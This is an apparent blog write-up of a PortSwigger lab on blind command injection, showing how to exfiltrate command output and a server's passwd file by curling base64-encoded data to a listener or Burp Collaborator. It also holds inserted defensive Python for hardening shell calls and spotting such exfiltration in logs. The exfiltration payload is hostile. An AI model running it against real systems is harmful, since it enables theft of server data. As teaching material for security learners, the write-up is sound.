Command Injection Blind Data Exfiltration out-of-band via URL

SidHawks
3 min read · Oct 1, 2021

Command injection is a vulnerability that lets user input reach the operating-system shell, on GNU/Linux as well as on Windows. It arises when a program builds parameters or inputs for functions such as Python's sys and os modules without handling them correctly. I won't go over everything about this vulnerability, but I will explain a method to extract more data from a blind command injection on Linux.

In many scenarios we obtain a command injection but the command's output is not returned on the web page. To still recover that output, we can make an out-of-band request and place the result of the injected command in the URL.
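To make the root cause concrete, here is an added example (my own code, not from the post or the PortSwigger lab) of the vulnerable pattern beside its hardened form. The `mail` command line, the email allow-list and the use of `echo` as a stand-in program are assumptions for illustration; the vulnerable string is only inspected, never executed.

```python
import re
import shlex
import subprocess

# Allow-list for the feedback form's email field (assumed pattern): only the
# characters an address needs, so shell metacharacters ($, `, |, ;, &, spaces)
# never reach a command line.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def vulnerable_command(email):
    """How a vulnerable app builds its command: raw interpolation into a string
    that is later handed to a shell (os.system / subprocess with shell=True).
    Anything the user typed, including $(...) or backticks, lands in the string
    verbatim. The string is only returned here for inspection."""
    return "mail -s 'Site feedback' " + email


def is_valid_email(email):
    return EMAIL_RE.fullmatch(email) is not None


def hardened_argv(email):
    """Hardened version: validate against the allow-list, then build an argv
    list so the program receives the address as a single argument and no shell
    is involved. Raises ValueError for input outside the allow-list."""
    if not is_valid_email(email):
        raise ValueError("email rejected by allow-list")
    # '--' stops the mail program from reading a leading '-' as an option
    return ["mail", "-s", "Site feedback", "--", email]


def run_without_shell(argument):
    """Shows that shell=False passes metacharacters through literally: the
    argument reaches the program unchanged. Uses echo as a harmless stand-in
    for the mail program (assumes a POSIX system with echo on PATH)."""
    result = subprocess.run(["echo", argument], capture_output=True,
                            text=True, check=True)
    return result.stdout.rstrip("\n")


def quoted_fallback(email):
    """If a shell string is unavoidable, shlex.quote wraps the value so the
    shell sees one literal word. Validation stays the primary control; quoting
    is defence in depth."""
    return "mail -s 'Site feedback' " + shlex.quote(email)


if __name__ == "__main__":
    payload = "a@example.com$(id)"  # constructed input, same shape as the post's payload
    print("vulnerable :", vulnerable_command(payload))
    print("argv echo  :", run_without_shell(payload))   # prints the $(id) literally
    print("quoted     :", quoted_fallback(payload))
    try:
        hardened_argv(payload)
    except ValueError as err:
        print("hardened   : rejected,", err)
    print("hardened   :", hardened_argv("a@example.com"))
```

The point of `run_without_shell` is that the `$(id)` survives untouched: without a shell there is nothing to expand it, which is why an argv list is the primary fix and quoting only the fallback.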

To demonstrate this situation I started a local Python HTTP server and, from another terminal, made a request whose URL embeds the id command in a subshell. The Python server logs a GET request containing a fragment of the output.

Only a fragment arrives because the output contains special characters and spaces. An alternative is base64 encoding, which handles those characters, so the request can carry much more of the output.

To deal with newlines when the base64 output is long, we remove the "\n" with the tr command (abbreviation of translate).

We know that in the web application the injection doesn't work with the bare command; we have to nest a second subshell command inside the same payload: $( <Command> `<Command2>` ).

$(curl http://0.0.0.0:8000/`id | base64 | tr -d "\n"`)
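From the defender's side, the same pattern is what shows up in web-server or egress-proxy logs: a request whose path is one long base64 blob. The following is an added example (my own code, not from the post) that scans access-log lines for such paths, decodes them and flags decoded content that looks like id output or passwd entries. The log lines are constructed for the example, and the id output they encode is made up.

```python
import base64
import binascii
import re
import string
from urllib.parse import unquote

# Constructed sample data (not real traffic). The base64 segment is built here
# from a made-up `id` output, i.e. what `id | base64 | tr -d "\n"` would yield.
FAKE_ID_OUTPUT = b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
FAKE_B64 = base64.b64encode(FAKE_ID_OUTPUT).decode()

SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    f'10.0.0.5 - - [01/Oct/2021:12:00:07 +0000] "GET /{FAKE_B64} HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Oct/2021:12:00:09 +0000] "GET /static/app.js HTTP/1.1" 200 2048',
    # benign base64-looking segment ("favicon.ico"), should not be flagged
    '10.0.0.9 - - [01/Oct/2021:12:00:11 +0000] "GET /assets/ZmF2aWNvbi5pY28 HTTP/1.1" 200 64',
]

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')
B64_RE = re.compile(r"[A-Za-z0-9+/_-]+={0,2}")   # standard and URL-safe alphabets
MIN_LEN = 12

# What decoded content looks like when a command's output was exfiltrated.
INDICATORS = [
    ("id output", re.compile(r"uid=\d+\(")),
    ("passwd entry", re.compile(r"^[^:\n]+:[^:\n]*:\d+:\d+:", re.M)),
    ("shell path", re.compile(r":/bin/(?:ba)?sh")),
]


def candidates(path):
    """Yield base64-shaped pieces of a request path: the whole path first (a
    blob may itself contain '/'), then each '/'-separated segment."""
    path = unquote(path).split("?", 1)[0].lstrip("/")
    seen = set()
    for piece in [path, *path.split("/")]:
        if len(piece) >= MIN_LEN and B64_RE.fullmatch(piece) and piece not in seen:
            seen.add(piece)
            yield piece


def try_decode(blob):
    """Decode a blob as base64 (URL-safe mapped to standard, padding restored);
    return printable ASCII text or None."""
    std = blob.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    try:
        text = base64.b64decode(std, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not text or not all(ch in string.printable for ch in text):
        return None
    return text


def scan_log(lines):
    """Return one finding per log line whose path carries a decodable blob
    matching an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for blob in candidates(m.group("path")):
            text = try_decode(blob)
            if text is None:
                continue
            for kind, pattern in INDICATORS:
                if pattern.search(text):
                    findings.append({"client": m.group("client"), "ts": m.group("ts"),
                                     "blob": blob, "kind": kind, "decoded": text})
                    break
            else:
                continue
            break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} {f['kind']}: {f['decoded'].strip()}")
```

Decoding with `validate=True` and rejecting non-printable results keeps ordinary URL segments like `ZmF2aWNvbi5pY28` from being flagged; in practice the same check belongs on outbound proxy logs, since the collaborator-style request in the post leaves the network from the server, not from the client.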

So far we have built up the payload; now let's explore the scenario on the PortSwigger platform.

The vulnerability was in the email input, where we can inject the command:

Intercepting the feedback request with Burp Suite:

In this case we use Burp Collaborator to receive the request, fetching the passwd file base64-encoded in the URL via HTTP:

Decoding the base64 shows the entire passwd file from the server machine.

Thank you for reading this far. You can develop more alternatives and try returning other files with this method; keep building your knowledge of these commands and try new things.

Laboratory: https://portswigger.net/web-security/os-command-injection